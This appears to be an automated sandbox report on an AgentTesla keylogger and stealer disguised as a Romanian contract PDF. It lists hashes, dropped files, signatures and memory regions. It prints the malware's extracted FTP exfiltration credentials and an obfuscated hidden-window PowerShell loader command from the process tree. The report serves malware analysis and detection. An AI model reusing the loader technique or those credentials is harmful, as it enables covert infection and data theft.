Overview

overview

10

Static

static

1

REVIZUIREA...df.exe

windows7-x64

10

REVIZUIREA...df.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    94s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231130-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231130-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07/12/2023, 07:26

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    REVIZUIREA CONTRACTULUI-pdf.exe

  • Size

    708KB

  • MD5

    380787d6ecbcc6cd4dd23df9da174c35

  • SHA1

    9298497f6ed0c8ab161a3c4a85c3a99b45613581

  • SHA256

    2dc56a2f3b12cbdb34a73d5d90e9759d48cc8eda0c8833cd64005559469a1058

  • SHA512

    8c75231ba6c44a946fabe2d12eb5e0980959a8cf4f9fabb6b6831c52d96b55d1d2cfd0ed84479b59192b3572a7a57888557311f6639c340d04fb4b24c235cb9b

  • SSDEEP

    12288:vwFGHEXzSTDHfwvNJUcXGzJTaylgimtdYM3O0V7bbW:v5HEXzI0NNXoJThlgZtub0V7u

Score
10/10
agentteslakeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:     ftp
  • Host:
    ftp://ftp.vvspijkenisse.nl
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    playingboyz231

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\REVIZUIREA CONTRACTULUI-pdf.exe
    "C:\Users\Admin\AppData\Local\Temp\REVIZUIREA CONTRACTULUI-pdf.exe"
    1⤵
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:4348
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Calypso=Get-Content 'C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Beskyttelsesmidler\Unlighted\Splanchnographer.Kna';$Kalispel=$Calypso.SubString(53259,3);.$Kalispel($Calypso)"
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3376
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
        3⤵
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2840
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2840 -s 1476
          4⤵
          • Program crash
          PID:3492
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2840 -ip 2840
    1⤵
      PID:472

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\Rkkens.ini
      Filesize

      32B

      MD5

      a8ca1db6ae34f5e5c152094f44f92476

      SHA1

      9fe0fd4e6907c4f9099d2533c3bade4ffa0968e7

      SHA256

      1f0dbc97d6570f2f5a1e18f82842c9a0007e568ca8fb768c123637ef5077aad3

      SHA512

      e48e987e1f8297b17f7fb5b8b34da6131156834310987600b20b0dcff4c43632ccb4b2305030a4a999f783176d480c8300e6aef92afbb2032379eca6dac88b5a

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zvuqar0u.3x0.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Beskyttelsesmidler\Unlighted\Splanchnographer.Kna
      Filesize

      52KB

      MD5

      5d12c9d49bef39741a5077c2ea1a3118

      SHA1

      b6075ecd3a820510b37ca62f1d74d95f599c2fdc

      SHA256

      41b05b53faaef42cacc83c7c37c4e47bcf43eaef1fea8ef28b9d90a5bcb555b6

      SHA512

      27eae2e897e39de8b06a59454c8e49273386e066e5900d19f99b415ebbddc150e42794968774412c0f72bf5c6f0e1924469894ca013f6b98a081b411c8b1bf86

      Download Submit

    • C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Blancheredes\Dysadaptation\sophia.Non
      Filesize

      309KB

      MD5

      f5017cc8df8d48957ca45afacd609df3

      SHA1

      e769c4d4e9ab2101f6f088135efd580a9ef9e4da

      SHA256

      61c7f23798426b06bbfb489a893a89567db6c8c84700d69a14e410c4e52b4366

      SHA512

      d6215ee0dc6b3fc3e875c88dbf6c012cc17e20bd0812cfe8ab2f2b66cc3116a5705f25af99986d55fb10b198019452f6c9c4cae8996a76f2a52630efdab0083e

      Download Submit

    • memory/2840-181-0x0000000021FF0000-0x0000000022000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2840-178-0x00000000740F0000-0x00000000748A0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/2840-177-0x00000000005A0000-0x0000000003F1B000-memory.dmp

      Filesize

      57.5MB

      Download

    • memory/2840-176-0x000000006EEF0000-0x0000000070144000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/2840-175-0x0000000077D51000-0x0000000077E71000-memory.dmp

      Filesize

      1.1MB

      Download

    • memory/2840-180-0x000000006EEF0000-0x000000006EF30000-memory.dmp

      Filesize

      256KB

      Download

    • memory/2840-174-0x0000000077DD8000-0x0000000077DD9000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2840-182-0x00000000005A0000-0x0000000003F1B000-memory.dmp

      Filesize

      57.5MB

      Download

    • memory/2840-185-0x00000000740F0000-0x00000000748A0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/3376-163-0x00000000079D0000-0x0000000007F74000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/3376-172-0x0000000002DC0000-0x0000000002DD0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3376-162-0x0000000006960000-0x0000000006982000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3376-160-0x0000000007380000-0x0000000007416000-memory.dmp

      Filesize

      600KB

      Download

    • memory/3376-159-0x0000000006420000-0x000000000646C000-memory.dmp

      Filesize

      304KB

      Download

    • memory/3376-165-0x0000000008600000-0x0000000008C7A000-memory.dmp

      Filesize

      6.5MB

      Download

    • memory/3376-158-0x00000000063D0000-0x00000000063EE000-memory.dmp

      Filesize

      120KB

      Download

    • memory/3376-168-0x00000000078D0000-0x00000000078D4000-memory.dmp

      Filesize

      16KB

      Download

    • memory/3376-169-0x0000000008C80000-0x000000000C5FB000-memory.dmp

      Filesize

      57.5MB

      Download

    • memory/3376-171-0x0000000077D51000-0x0000000077E71000-memory.dmp

      Filesize

      1.1MB

      Download

    • memory/3376-170-0x00000000740F0000-0x00000000748A0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/3376-161-0x0000000006910000-0x000000000692A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/3376-157-0x0000000005EE0000-0x0000000006234000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/3376-147-0x0000000005D70000-0x0000000005DD6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/3376-146-0x0000000005D00000-0x0000000005D66000-memory.dmp

      Filesize

      408KB

      Download

    • memory/3376-145-0x0000000005420000-0x0000000005442000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3376-144-0x00000000054E0000-0x0000000005B08000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/3376-143-0x0000000002DC0000-0x0000000002DD0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3376-179-0x00000000740F0000-0x00000000748A0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/3376-142-0x0000000002DC0000-0x0000000002DD0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3376-141-0x00000000740F0000-0x00000000748A0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/3376-140-0x0000000002E10000-0x0000000002E46000-memory.dmp

      Filesize

      216KB

      Download